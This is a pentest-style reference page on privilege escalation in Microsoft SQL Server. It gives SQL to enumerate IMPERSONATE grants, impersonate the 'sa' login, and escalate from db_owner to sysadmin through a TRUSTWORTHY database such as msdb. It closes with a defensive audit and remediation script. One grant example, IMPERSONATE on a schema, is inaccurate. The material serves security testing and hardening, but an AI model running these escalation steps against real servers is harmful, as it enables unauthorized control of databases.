# Privilege Escalation

## Overview

> Privilege escalation in Microsoft SQL Server is the process of gaining higher levels of access or control over the SQL Server instance or database than originally granted.

## Examples

### Enumerating IMPERSONATE permissions

> IMPERSONATE permissions in Microsoft SQL Server allow a user to impersonate another user or login and execute statements on their behalf. This can be useful for troubleshooting and testing permissions, but it also introduces potential security risks if not used properly.

#### Enabling IMPERSONATE permissions

To grant IMPERSONATE permission at the server level, use the following command:

```sql
GRANT IMPERSONATE ON LOGIN::[login_name] TO [user_name];
```

To grant IMPERSONATE permission at the database level, use the following command:

```sql
GRANT IMPERSONATE ON USER::[user_name] TO [user_name];
```

To grant IMPERSONATE permission at the schema level, use the following command:

```sql
GRANT IMPERSONATE ON SCHEMA::[schema_name] TO [user_name];
```

#### Finding IMPERSONATE permissions

To find out which users or logins have been granted IMPERSONATE permission in Microsoft SQL Server, you can use the following query:

{% code overflow="wrap" %}

```sql
-- Lists every server principal that has been GRANTED IMPERSONATE and the login it may impersonate.
-- The join must use grantee_principal_id (the holder of the permission), not grantor_principal_id (who issued it).
SELECT DISTINCT grantee.name AS grantee, target.name AS impersonated_login
FROM sys.server_permissions a
INNER JOIN sys.server_principals grantee ON a.grantee_principal_id = grantee.principal_id
INNER JOIN sys.server_principals target ON a.major_id = target.principal_id
WHERE a.permission_name = 'IMPERSONATE';
```

{% endcode %}

### EXECUTE AS LOGIN

> The EXECUTE AS LOGIN statement in Microsoft SQL Server allows a user to execute a batch of SQL statements in the context of a specified login. This can be useful for testing permissions and troubleshooting issues related to permissions and access controls.
>
> When using EXECUTE AS LOGIN, the user must have the IMPERSONATE permission on the target login. This permission is typically granted to members of the sysadmin fixed server role, but can also be granted to other users and roles as needed.

{% code overflow="wrap" %}

```sql
EXECUTE AS LOGIN = 'sa';
-- SQL statements placed here run in the security context of the 'sa' login
SELECT SUSER_NAME();  -- returns 'sa' while the impersonation is active
REVERT;               -- switch back to the original login
```

{% endcode %}

### EXECUTE AS USER

> The EXECUTE AS USER statement in Microsoft SQL Server allows a user to execute a batch of SQL statements in the context of a specified user. This can be useful for testing permissions and troubleshooting issues related to permissions and access controls.
>
> When using EXECUTE AS USER, the user must have the IMPERSONATE permission on the target user. This permission is typically granted to members of the sysadmin fixed server role, but can also be granted to other users and roles as needed.

```sql
-- 'sa' is a login, not a database user; inside a database the sa login maps to the 'dbo' user
EXECUTE AS USER = 'dbo';
-- SQL statements placed here run in the security context of the 'dbo' database user
SELECT USER_NAME();   -- returns 'dbo' while the impersonation is active
REVERT;               -- switch back to the original user
```

### From db\_owner to sysadmin

> In Microsoft SQL Server, the db\_owner role has a high level of privileges within a specific database, but it does not have permissions outside that database. However, if a database has been marked as trustworthy, a user with the db\_owner role can execute code within that database with the permissions of the database owner. This can allow an attacker to elevate their privileges and potentially gain access to the sysadmin role.

#### Identify a trustworthy database

Use the following query to identify trustworthy databases:

{% code overflow="wrap" %}

```sql
SELECT name, is_trustworthy_on FROM sys.databases WHERE is_trustworthy_on = 1;
```

{% endcode %}

Use the following query to verify your user role:

{% code overflow="wrap" %}

```sql
USE <trustworthy_db>;
SELECT r.name AS RoleName
FROM sys.database_role_members rm
INNER JOIN sys.database_principals p ON rm.member_principal_id = p.principal_id
INNER JOIN sys.database_principals r ON rm.role_principal_id = r.principal_id
WHERE p.name = USER_NAME() AND r.name = 'db_owner';
```

{% endcode %}

If your user is a db\_owner of a trustworthy database, you can elevate your privileges:

{% code overflow="wrap" %}

```sql
-- msdb is marked TRUSTWORTHY and owned by sa by default, so its dbo user runs with sa's rights
USE msdb;
EXECUTE AS USER = 'dbo';
```

{% endcode %}
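The three conditions this page relies on (TRUSTWORTHY databases owned by a sysadmin login, non-sysadmin members of db\_owner in such a database, and IMPERSONATE grants at server and database level) can be audited together. The following script is an added example written for this page, not code from the original; it assumes it is run by a login with VIEW SERVER STATE and VIEW ANY DEFINITION, and the second query must be run inside each database flagged by the first.

```sql
-- Added audit script (not from the original page). Assumes a login with
-- VIEW SERVER STATE / VIEW ANY DEFINITION. Run query 1 once per instance,
-- query 2 inside every database that query 1 returns, query 3 per database.

-- 1. TRUSTWORTHY databases whose owner is a sysadmin: a db_owner member
--    there can reach sysadmin-level rights (msdb is TRUSTWORTHY by default).
SELECT d.name                   AS database_name,
       SUSER_SNAME(d.owner_sid) AS owner_login,
       IS_SRVROLEMEMBER('sysadmin', SUSER_SNAME(d.owner_sid)) AS owner_is_sysadmin
FROM sys.databases AS d
WHERE d.is_trustworthy_on = 1
  AND IS_SRVROLEMEMBER('sysadmin', SUSER_SNAME(d.owner_sid)) = 1;

-- 2. Inside a flagged database: db_owner members that are NOT sysadmins.
--    These are the principals the db_owner-to-sysadmin path applies to.
SELECT dp.name             AS db_owner_member,
       dp.type_desc        AS principal_type,
       SUSER_SNAME(dp.sid) AS mapped_login
FROM sys.database_role_members AS rm
INNER JOIN sys.database_principals AS r  ON rm.role_principal_id   = r.principal_id
INNER JOIN sys.database_principals AS dp ON rm.member_principal_id = dp.principal_id
WHERE r.name = 'db_owner'
  AND ISNULL(IS_SRVROLEMEMBER('sysadmin', SUSER_SNAME(dp.sid)), 0) = 0;

-- 3. IMPERSONATE grants (state G = GRANT, W = GRANT WITH GRANT OPTION):
--    who can EXECUTE AS whom, at server scope and in the current database.
SELECT 'SERVER' AS scope, grantee.name AS grantee, target.name AS can_impersonate
FROM sys.server_permissions AS sp
INNER JOIN sys.server_principals AS grantee ON sp.grantee_principal_id = grantee.principal_id
INNER JOIN sys.server_principals AS target  ON sp.major_id = target.principal_id
WHERE sp.permission_name = 'IMPERSONATE' AND sp.state IN ('G', 'W')
UNION ALL
SELECT 'DATABASE', grantee.name, target.name
FROM sys.database_permissions AS dbp
INNER JOIN sys.database_principals AS grantee ON dbp.grantee_principal_id = grantee.principal_id
INNER JOIN sys.database_principals AS target  ON dbp.major_id = target.principal_id
WHERE dbp.permission_name = 'IMPERSONATE' AND dbp.state IN ('G', 'W');

-- Remediation for a database that does not need the flag (replace the placeholder):
-- ALTER DATABASE [<database_name>] SET TRUSTWORTHY OFF;
```

Any row from query 2 whose database also appears in query 1 is the exact situation described under "From db\_owner to sysadmin"; rows from query 3 are the IMPERSONATE grants the EXECUTE AS sections depend on.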
